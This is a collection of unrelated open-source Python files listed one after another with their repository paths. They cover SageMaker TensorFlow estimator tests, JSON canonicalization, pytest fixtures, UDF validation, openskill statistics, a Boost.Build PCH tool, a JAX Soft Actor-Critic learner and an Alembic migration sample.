# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. from __future__ import absolute_import from mock import Mock, patch from packaging import version import pytest from sagemaker.tensorflow import TensorFlow REGION = "us-west-2" ENV_INPUT = {"env_key1": "env_val1", "env_key2": "env_val2", "env_key3": "env_val3"} @pytest.fixture() def sagemaker_session(): return Mock(name="sagemaker_session", boto_region_name=REGION) def _build_tf(sagemaker_session, **kwargs): return TensorFlow( sagemaker_session=sagemaker_session, entry_point="dummy.py", role="dummy-role", instance_count=1, instance_type="ml.c4.xlarge", **kwargs, ) @patch("sagemaker.fw_utils.python_deprecation_warning") def test_estimator_py2_deprecation_warning(warning, sagemaker_session): estimator = _build_tf(sagemaker_session, framework_version="2.1.1", py_version="py2") assert estimator.py_version == "py2" warning.assert_called_with("tensorflow", "2.1.1") def test_py2_version_deprecated(sagemaker_session): with pytest.raises(AttributeError) as e: _build_tf(sagemaker_session, framework_version="2.1.2", py_version="py2") msg = ( "Python 2 containers are only available with 2.1.1 and lower versions. " "Please use a Python 3 container." ) assert msg in str(e.value) def test_py2_version_is_not_deprecated(sagemaker_session): estimator = _build_tf(sagemaker_session, framework_version="1.15.0", py_version="py2") assert estimator.py_version == "py2" estimator = _build_tf(sagemaker_session, framework_version="2.0.0", py_version="py2") assert estimator.py_version == "py2" def test_framework_name(sagemaker_session): tf = _build_tf(sagemaker_session, framework_version="1.15.2", py_version="py3") assert tf._framework_name == "tensorflow" def test_tf_add_environment_variables(sagemaker_session): tf = _build_tf( sagemaker_session, framework_version="1.15.2", py_version="py3", environment=ENV_INPUT, ) assert tf.environment == ENV_INPUT def test_tf_miss_environment_variables(sagemaker_session): tf = _build_tf( sagemaker_session, framework_version="1.15.2", py_version="py3", environment=None, ) assert not tf.environment def test_enable_sm_metrics(sagemaker_session): tf = _build_tf( sagemaker_session, framework_version="1.15.2", py_version="py3", enable_sagemaker_metrics=True, ) assert tf.enable_sagemaker_metrics def test_disable_sm_metrics(sagemaker_session): tf = _build_tf( sagemaker_session, framework_version="1.15.2", py_version="py3", enable_sagemaker_metrics=False, ) assert not tf.enable_sagemaker_metrics def test_disable_sm_metrics_if_fw_ver_is_less_than_1_15( sagemaker_session, tensorflow_training_version, tensorflow_training_py_version ): if version.Version(tensorflow_training_version) > version.Version("1.14"): pytest.skip("This test is for TF 1.14 and lower.") tf = _build_tf( sagemaker_session, framework_version=tensorflow_training_version, py_version=tensorflow_training_py_version, image_uri="old-image", ) assert tf.enable_sagemaker_metrics is None def test_enable_sm_metrics_if_fw_ver_is_at_least_1_15( sagemaker_session, tensorflow_training_version, tensorflow_training_py_version ): if version.Version(tensorflow_training_version) < version.Version("1.15"): pytest.skip("This test is for TF 1.15 and higher.") tf = _build_tf( sagemaker_session, framework_version=tensorflow_training_version, py_version=tensorflow_training_py_version, ) assert tf.enable_sagemaker_metrics def test_require_image_uri_if_fw_ver_is_less_than_1_11( sagemaker_session, tensorflow_training_version, tensorflow_training_py_version ): if version.Version(tensorflow_training_version) > version.Version("1.10"): pytest.skip("This test is for TF 1.10 and lower.") with pytest.raises(ValueError) as e: _build_tf( sagemaker_session, framework_version=tensorflow_training_version, py_version=tensorflow_training_py_version, ) expected_msg = ( "TF {version} supports only legacy mode. Please supply the image URI directly with " "'image_uri=520713654638.dkr.ecr.{region}.amazonaws.com/" "sagemaker-tensorflow:{version}-cpu-py2' and set 'model_dir=False'. If you are using any " "legacy parameters (training_steps, evaluation_steps, checkpoint_path, requirements_file), " "make sure to pass them directly as hyperparameters instead." ).format(version=tensorflow_training_version, region=REGION) assert expected_msg in str(e.value)
util/canonicaljson.py
giuseppe/quay
2,027
9359
<reponame>giuseppe/quay import collections def canonicalize(json_obj, preserve_sequence_order=True): """ This function canonicalizes a Python object that will be serialized as JSON. Example usage: json.dumps(canonicalize(my_obj)) Args: json_obj (object): the Python object that will later be serialized as JSON. Returns: object: json_obj now sorted to its canonical form. """ if isinstance(json_obj, collections.MutableMapping): sorted_obj = sorted( { key: canonicalize(val, preserve_sequence_order) for key, val in json_obj.items() }.items() ) return collections.OrderedDict(sorted_obj) elif isinstance(json_obj, (list, tuple)): seq = [canonicalize(val, preserve_sequence_order) for val in json_obj] return seq if preserve_sequence_order else sorted(seq) return json_obj
external/model-preparation-algorithm/tests/conftest.py
opencv/openvino_training_extensions
775
9370
<reponame>opencv/openvino_training_extensions<filename>external/model-preparation-algorithm/tests/conftest.py # Copyright (C) 2022 Intel Corporation # SPDX-License-Identifier: Apache-2.0 # try: import e2e.fixtures from e2e.conftest_utils import * # noqa from e2e.conftest_utils import pytest_addoption as _e2e_pytest_addoption # noqa from e2e import config # noqa from e2e.utils import get_plugins_from_packages pytest_plugins = get_plugins_from_packages([e2e]) except ImportError: _e2e_pytest_addoption = None pass import config import pytest from ote_sdk.test_suite.pytest_insertions import * from ote_sdk.test_suite.training_tests_common import REALLIFE_USECASE_CONSTANT pytest_plugins = get_pytest_plugins_from_ote() ote_conftest_insertion(default_repository_name='ote/training_extensions/external/model-preparation-algorithm') @pytest.fixture def ote_test_domain_fx(): return 'model-preparation-algorithm' @pytest.fixture def ote_test_scenario_fx(current_test_parameters_fx): assert isinstance(current_test_parameters_fx, dict) if current_test_parameters_fx.get('usecase') == REALLIFE_USECASE_CONSTANT: return 'performance' else: return 'integration' @pytest.fixture(scope='session') def ote_templates_root_dir_fx(): import os.path as osp import logging logger = logging.getLogger(__name__) root = osp.dirname(osp.dirname(osp.realpath(__file__))) root = f'{root}/configs/' logger.debug(f'overloaded ote_templates_root_dir_fx: return {root}') return root @pytest.fixture(scope='session') def ote_reference_root_dir_fx(): import os.path as osp import logging logger = logging.getLogger(__name__) root = osp.dirname(osp.dirname(osp.realpath(__file__))) root = f'{root}/tests/reference/' logger.debug(f'overloaded ote_reference_root_dir_fx: return {root}') return root # pytest magic def pytest_generate_tests(metafunc): ote_pytest_generate_tests_insertion(metafunc) def pytest_addoption(parser): ote_pytest_addoption_insertion(parser)
ibis/udf/validate.py
rtpsw/ibis
986
9371
"""Validation for UDFs. Warning: This is an experimental module and API here can change without notice. DO NOT USE DIRECTLY. """ from inspect import Parameter, Signature, signature from typing import Any, Callable, List import ibis.common.exceptions as com from ibis.expr.datatypes import DataType def _parameter_count(funcsig: Signature) -> int: """Get the number of positional-or-keyword or position-only parameters in a function signature. Parameters ---------- funcsig : inspect.Signature A UDF signature Returns ------- int The number of parameters """ return sum( param.kind in {param.POSITIONAL_OR_KEYWORD, param.POSITIONAL_ONLY} for param in funcsig.parameters.values() if param.default is Parameter.empty ) def validate_input_type( input_type: List[DataType], func: Callable ) -> Signature: """Check that the declared number of inputs (the length of `input_type`) and the number of inputs to `func` are equal. If the signature of `func` uses *args, then no check is done (since no check can be done). Parameters ---------- input_type : List[DataType] func : callable Returns ------- inspect.Signature """ funcsig = signature(func) params = funcsig.parameters.values() # We can only do validation if all the positional arguments are explicit # (i.e. no *args) if not any(param.kind is Parameter.VAR_POSITIONAL for param in params): declared_parameter_count = len(input_type) function_parameter_count = _parameter_count(funcsig) if declared_parameter_count != function_parameter_count: raise TypeError( 'Function signature {!r} has {:d} parameters, ' 'input_type has {:d}. These must match. Non-column ' 'parameters must be defined as keyword only, i.e., ' 'def foo(col, *, function_param).'.format( func.__name__, function_parameter_count, declared_parameter_count, ) ) return funcsig def validate_output_type(output_type: Any) -> None: """Check that the output type is a single datatype.""" if isinstance(output_type, list): raise com.IbisTypeError( 'The output type of a UDF must be a single datatype.' )
summary/summary_avail.py
bit0fun/plugins
173
9395
from datetime import datetime # ensure an rpc peer is added def addpeer(p, rpcpeer): pid = rpcpeer['id'] if pid not in p.persist['peerstate']: p.persist['peerstate'][pid] = { 'connected': rpcpeer['connected'], 'last_seen': datetime.now() if rpcpeer['connected'] else None, 'avail': 1.0 if rpcpeer['connected'] else 0.0 } # exponetially smooth online/offline states of peers def trace_availability(p, rpcpeers): p.persist['availcount'] += 1 leadwin = max(min(p.avail_window, p.persist['availcount'] * p.avail_interval), p.avail_interval) samples = leadwin / p.avail_interval alpha = 1.0 / samples beta = 1.0 - alpha for rpcpeer in rpcpeers['peers']: pid = rpcpeer['id'] addpeer(p, rpcpeer) if rpcpeer['connected']: p.persist['peerstate'][pid]['last_seen'] = datetime.now() p.persist['peerstate'][pid]['connected'] = True p.persist['peerstate'][pid]['avail'] = 1.0 * alpha + p.persist['peerstate'][pid]['avail'] * beta else: p.persist['peerstate'][pid]['connected'] = False p.persist['peerstate'][pid]['avail'] = 0.0 * alpha + p.persist['peerstate'][pid]['avail'] * beta
openskill/statistics.py
CalColson/openskill.py
120
9400
<gh_stars>100-1000 import sys import scipy.stats normal = scipy.stats.norm(0, 1) def phi_major(x): return normal.cdf(x) def phi_minor(x): return normal.pdf(x) def v(x, t): xt = x - t denom = phi_major(xt) return -xt if (denom < sys.float_info.epsilon) else phi_minor(xt) / denom def w(x, t): xt = x - t denom = phi_major(xt) if denom < sys.float_info.epsilon: return 1 if (x < 0) else 0 return v(x, t) * (v(x, t) + xt) def vt(x, t): xx = abs(x) b = phi_major(t - xx) - phi_major(-t - xx) if b < 1e-5: if x < 0: return -x - t return -x + t a = phi_minor(-t - xx) - phi_minor(t - xx) return (-a if x < 0 else a) / b def wt(x, t): xx = abs(x) b = phi_major(t - xx) - phi_major(-t - xx) if b < sys.float_info.epsilon: return 1.0 return ((t - xx) * phi_minor(t - xx) + (t + xx) * phi_minor(-t - xx)) / b + vt( x, t ) * vt(x, t)
src/tools/pch.py
MaxSac/build
11,356
9445
# Status: Being ported by Steven Watanabe # Base revision: 47077 # # Copyright (c) 2005 <NAME>. # Copyright 2006 <NAME> # Copyright (c) 2008 <NAME> # # Use, modification and distribution is subject to the Boost Software # License Version 1.0. (See accompanying file LICENSE_1_0.txt or # http://www.boost.org/LICENSE_1_0.txt) ##### Using Precompiled Headers (Quick Guide) ##### # # Make precompiled mypch.hpp: # # import pch ; # # cpp-pch mypch # : # sources # mypch.hpp # : # requiremnts # <toolset>msvc:<source>mypch.cpp # ; # # Add cpp-pch to sources: # # exe hello # : main.cpp hello.cpp mypch # ; from b2.build import type, feature, generators from b2.tools import builtin type.register('PCH', ['pch']) type.register('C_PCH', [], 'PCH') type.register('CPP_PCH', [], 'PCH') # Control precompiled header (PCH) generation. feature.feature('pch', ['on', 'off'], ['propagated']) feature.feature('pch-header', [], ['free', 'dependency']) feature.feature('pch-file', [], ['free', 'dependency']) class PchGenerator(generators.Generator): """ Base PCH generator. The 'run' method has the logic to prevent this generator from being run unless it's being used for a top-level PCH target. """ def action_class(self): return builtin.CompileAction def run(self, project, name, prop_set, sources): if not name: # Unless this generator is invoked as the top-most generator for a # main target, fail. This allows using 'H' type as input type for # this generator, while preventing Boost.Build to try this generator # when not explicitly asked for. # # One bad example is msvc, where pch generator produces both PCH # target and OBJ target, so if there's any header generated (like by # bison, or by msidl), we'd try to use pch generator to get OBJ from # that H, which is completely wrong. By restricting this generator # only to pch main target, such problem is solved. pass else: r = self.run_pch(project, name, prop_set.add_raw(['<define>BOOST_BUILD_PCH_ENABLED']), sources) return generators.add_usage_requirements( r, ['<define>BOOST_BUILD_PCH_ENABLED']) # This rule must be overridden by the derived classes. def run_pch(self, project, name, prop_set, sources): pass # NOTE: requirements are empty, default pch generator can be applied when # pch=off. generators.register(builtin.DummyGenerator( "pch.default-c-pch-generator", False, [], ['C_PCH'], [])) generators.register(builtin.DummyGenerator( "pch.default-cpp-pch-generator", False, [], ['CPP_PCH'], []))
tests/test_parse.py
vkleen/skidl
700
9451
<gh_stars>100-1000 # -*- coding: utf-8 -*- # The MIT License (MIT) - Copyright (c) 2016-2021 <NAME>. import pytest from skidl import netlist_to_skidl from .setup_teardown import get_filename, setup_function, teardown_function def test_parser_1(): netlist_to_skidl(get_filename("Arduino_Uno_R3_From_Scratch.net"))
jaxrl/agents/sac_v1/sac_v1_learner.py
anuragajay/jaxrl
157
9481
"""Implementations of algorithms for continuous control.""" import functools from typing import Optional, Sequence, Tuple import jax import jax.numpy as jnp import numpy as np import optax from jaxrl.agents.sac import temperature from jaxrl.agents.sac.actor import update as update_actor from jaxrl.agents.sac.critic import target_update from jaxrl.agents.sac_v1.critic import update_q, update_v from jaxrl.datasets import Batch from jaxrl.networks import critic_net, policies from jaxrl.networks.common import InfoDict, Model, PRNGKey @functools.partial(jax.jit, static_argnames=('update_target')) def _update_jit( rng: PRNGKey, actor: Model, critic: Model, value: Model, target_value: Model, temp: Model, batch: Batch, discount: float, tau: float, target_entropy: float, update_target: bool ) -> Tuple[PRNGKey, Model, Model, Model, Model, Model, InfoDict]: new_critic, critic_info = update_q(critic, target_value, batch, discount) rng, key = jax.random.split(rng) new_actor, actor_info = update_actor(key, actor, new_critic, temp, batch) rng, key = jax.random.split(rng) new_value, value_info = update_v(key, new_actor, new_critic, value, temp, batch, True) if update_target: new_target_value = target_update(new_value, target_value, tau) else: new_target_value = target_value new_temp, alpha_info = temperature.update(temp, actor_info['entropy'], target_entropy) return rng, new_actor, new_critic, new_value, new_target_value, new_temp, { **critic_info, **value_info, **actor_info, **alpha_info } class SACV1Learner(object): def __init__(self, seed: int, observations: jnp.ndarray, actions: jnp.ndarray, actor_lr: float = 3e-4, value_lr: float = 3e-4, critic_lr: float = 3e-4, temp_lr: float = 3e-4, hidden_dims: Sequence[int] = (256, 256), discount: float = 0.99, tau: float = 0.005, target_update_period: int = 1, target_entropy: Optional[float] = None, init_temperature: float = 1.0): """ An implementation of the version of Soft-Actor-Critic described in https://arxiv.org/abs/1801.01290 """ action_dim = actions.shape[-1] if target_entropy is None: self.target_entropy = -action_dim / 2 else: self.target_entropy = target_entropy self.tau = tau self.target_update_period = target_update_period self.discount = discount rng = jax.random.PRNGKey(seed) rng, actor_key, critic_key, temp_key = jax.random.split(rng, 4) actor_def = policies.NormalTanhPolicy(hidden_dims, action_dim) actor = Model.create(actor_def, inputs=[actor_key, observations], tx=optax.adam(learning_rate=actor_lr)) critic_def = critic_net.DoubleCritic(hidden_dims) critic = Model.create(critic_def, inputs=[critic_key, observations, actions], tx=optax.adam(learning_rate=critic_lr)) value_def = critic_net.ValueCritic(hidden_dims) value = Model.create(value_def, inputs=[critic_key, observations], tx=optax.adam(learning_rate=value_lr)) target_value = Model.create(value_def, inputs=[critic_key, observations]) temp = Model.create(temperature.Temperature(init_temperature), inputs=[temp_key], tx=optax.adam(learning_rate=temp_lr)) self.actor = actor self.critic = critic self.value = value self.target_value = target_value self.temp = temp self.rng = rng self.step = 1 def sample_actions(self, observations: np.ndarray, temperature: float = 1.0) -> jnp.ndarray: rng, actions = policies.sample_actions(self.rng, self.actor.apply_fn, self.actor.params, observations, temperature) self.rng = rng actions = np.asarray(actions) return np.clip(actions, -1, 1) def update(self, batch: Batch) -> InfoDict: self.step += 1 new_rng, new_actor, new_critic, new_value, new_target_value, new_temp, info = _update_jit( self.rng, self.actor, self.critic, self.value, self.target_value, self.temp, batch, self.discount, self.tau, self.target_entropy, self.step % self.target_update_period == 0) self.rng = new_rng self.actor = new_actor self.critic = new_critic self.value = new_value self.target_value = new_target_value self.temp = new_temp return info
test_data/samples/alembic_template_output.py
goldstar611/ssort
238
9486
"""Example revision Revision ID: fdf0cf6487a3 Revises: Create Date: 2021-08-09 17:55:19.491713 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = "<KEY>" down_revision = None branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table( "example", sa.Column("example_id", sa.Integer(), nullable=False), ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table("measurements") # ### end Alembic commands ###